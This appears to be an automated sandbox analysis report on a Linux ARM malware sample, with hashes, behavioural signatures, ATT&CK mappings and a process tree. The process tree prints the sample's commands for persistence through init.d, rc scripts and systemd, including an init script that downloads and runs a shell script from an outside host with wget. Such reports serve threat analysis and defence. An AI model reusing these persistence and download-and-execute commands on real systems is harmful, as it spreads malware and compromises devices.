Analysis
-
max time kernel
150s -
max time network
151s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
19-09-2024 06:59
Static task
static1
Behavioral task
behavioral1
Sample
d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf
Resource
debian9-armhf-20240611-en
General
-
Target
d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf
-
Size
648KB
-
MD5
343770e1d6d9a1f782823d8305405da0
-
SHA1
f07f9fcad82694f36dac9e51e86b1331b69a5d19
-
SHA256
d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70
-
SHA512
1fc4e698c3beba8fd9345f1e6e3830824e5cb5a2fa352a9253eb017de546d01398e32b8e4cb10df13b9f7fc2cab9cde418c4233e5cbb4ca99f90dff6e03ec147
-
SSDEEP
12288:UB9mQoSyE0zYggEKavjwmitmCd89KiCMSggplw7wW0dFEGvW1VPH1h:UboB1zYggEKaLF28QdMx90dFEGvWTPH1
Malware Config
Signatures
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 670 sh 672 chmod 680 sh 683 sh 685 chmod -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf File opened for modification /dev/misc/watchdog d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf -
Creates/modifies environment variables 1 TTPs 1 IoCs
Creating/modifying environment variables is a common persistence mechanism.
description ioc Process File opened for modification /etc/profile d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf -
description ioc Process File opened for modification /etc/init.d/mybinary d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf File opened for modification /etc/init.d/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf sh -
Modifies rc script 2 TTPs 1 IoCs
Adding/modifying system rc scripts is a common persistence mechanism.
description ioc Process File opened for modification /etc/rc.local d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf -
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /etc/systemd/system/custom.service d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf -
Modifies Bash startup script 2 TTPs 1 IoCs
description ioc Process File opened for modification /etc/profile d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf -
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself /var/igorilla 657 d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf -
Enumerates kernel/hardware configuration 1 TTPs 1 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
description ioc Process File opened for reading /proc/cmdline systemctl File opened for reading /proc/filesystems mkdir File opened for reading /proc/filesystems systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/1/environ systemctl
Processes
-
/tmp/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf/tmp/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf1⤵
- Modifies Watchdog functionality
- Creates/modifies environment variables
- Modifies init.d
- Modifies rc script
- Modifies systemd
- Modifies Bash startup script
- Changes its process name
PID:657 -
/bin/shsh -c -- "systemctl enable custom.service >/dev/null 2>&1"2⤵PID:659
-
/bin/systemctlsystemctl enable custom.service3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:661
-
-
-
/bin/shsh -c -- "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"2⤵
- File and Directory Permissions Modification
PID:670 -
/bin/chmodchmod +x /etc/init.d/mybinary3⤵
- File and Directory Permissions Modification
PID:672
-
-
-
/bin/shsh -c -- "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"2⤵PID:674
-
/bin/lnln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary3⤵PID:677
-
-
-
/bin/shsh -c -- "echo \"#!/bin/sh # /etc/init.d/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf case \\\"\$1\\\" in start) echo 'Starting d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf' /tmp/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf & wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf' killall d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf ;; restart) \$0 stop \$0 start ;; *) echo \\\"Usage: \$0 {start|stop|restart}\\\" exit 1 ;; esac exit 0\" > /etc/init.d/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf"2⤵
- File and Directory Permissions Modification
- Modifies init.d
PID:680
-
-
/bin/shsh -c -- "chmod +x /etc/init.d/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf >/dev/null 2>&1"2⤵
- File and Directory Permissions Modification
PID:683 -
/bin/chmodchmod +x /etc/init.d/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf3⤵
- File and Directory Permissions Modification
PID:685
-
-
-
/bin/shsh -c -- "mkdir -p /etc/rc.d >/dev/null 2>&1"2⤵PID:687
-
/bin/mkdirmkdir -p /etc/rc.d3⤵
- Reads runtime system information
PID:688
-
-
-
/bin/shsh -c -- "ln -s /etc/init.d/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf /etc/rc.d/S99d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf >/dev/null 2>&1"2⤵PID:691
-
/bin/lnln -s /etc/init.d/d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf /etc/rc.d/S99d5fa8d05f1d132f880399b6857c45e891096d30a61ac41d4b0599e54d3128d70.elf3⤵PID:692
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
4XDG Autostart Entries
1Boot or Logon Initialization Scripts
2RC Scripts
2Create or Modify System Process
1Systemd Service
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Privilege Escalation
Boot or Logon Autostart Execution
4XDG Autostart Entries
1Boot or Logon Initialization Scripts
2RC Scripts
2Create or Modify System Process
1Systemd Service
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
185B
MD56d8ec3d8286c9e54cda61859e7b0fb05
SHA1020b4d6ab5a158cc2904bdd1815725a0f4901af7
SHA25618d6efcb9a5f5f296f6302ce3d4067fd3e8904b16f46759728444eb329bdfd27
SHA5129f9b61068a4d03315f0a14f1f03c97ec20b695cacd63c309211ced4b524f4631c7a680381decf6ca8f2a8779ba470bc1b1d131d48cdb105fac57451963dfef09
-
Filesize
693B
MD5481e0ab2347bdbe19afdac7bc9e30c24
SHA1fdc6b3f56318d4df063d522aea1aec6b1de39018
SHA256a8637084d9994e7fad8d5e9c626b3354f3231d4248aff66896c401f18073c056
SHA512c152ebef13025bf1273269d4c01589e399e121f8e783c2a040639759d90ad4134935b221ba376d56fd1684b207cd2d4cf10b0aafd5aacb6ae2831e16182e341b
-
Filesize
172B
MD54799ba3a615a9c7430e240895b4b3b03
SHA1af9b5d78f0e4080c0012ed0649f4cc7b407f30d2
SHA25691abe00464fc1b81daefa8c6517e51cc6edd1879c6d76363611144ad25cf7957
SHA512c6221bff5ba670eeec03f8ad19b17ad8ad2396fe10bebcbed8e016a26dc25f64d2393af2e0c1ae681a70ff2af9c35b8157f2ee2d000effbd4b9f92b2c75a8c22
-
Filesize
177B
MD5fe82379e0454f7aa7a203a0081600ace
SHA1ddbffcfff848b40e546edce6adc925821011f667
SHA25604c89719cc36fbad2d9650abbfc14e271a39bb0fa53d01f38ead377f6b72746d
SHA51220a50140a6bc4f737958193e7d7a45da1502c7c22de4660923a6f02832369f3aa0a6d09ff8687f111adae9021a5335f7694a2a4e5c29ef88e4fb5796f31f0701
-
Filesize
366B
MD5045e090de33705e58c29b6bf94e928d4
SHA13518ffd7c3b1a062a3798507e7a2f2172e34776d
SHA25697fc3a66d57fa4c249dd0a3108932711024cf5b4af48c0ec41994c25955f33b5
SHA512a2255a55ed69ad4e327fa117c79470ee96a1c55f08eca6fb3ded4552ea4cf57264e56c386c76fa41e72fec787f7be3d9b0edd8a07ff2cb69042d604b94fb4aba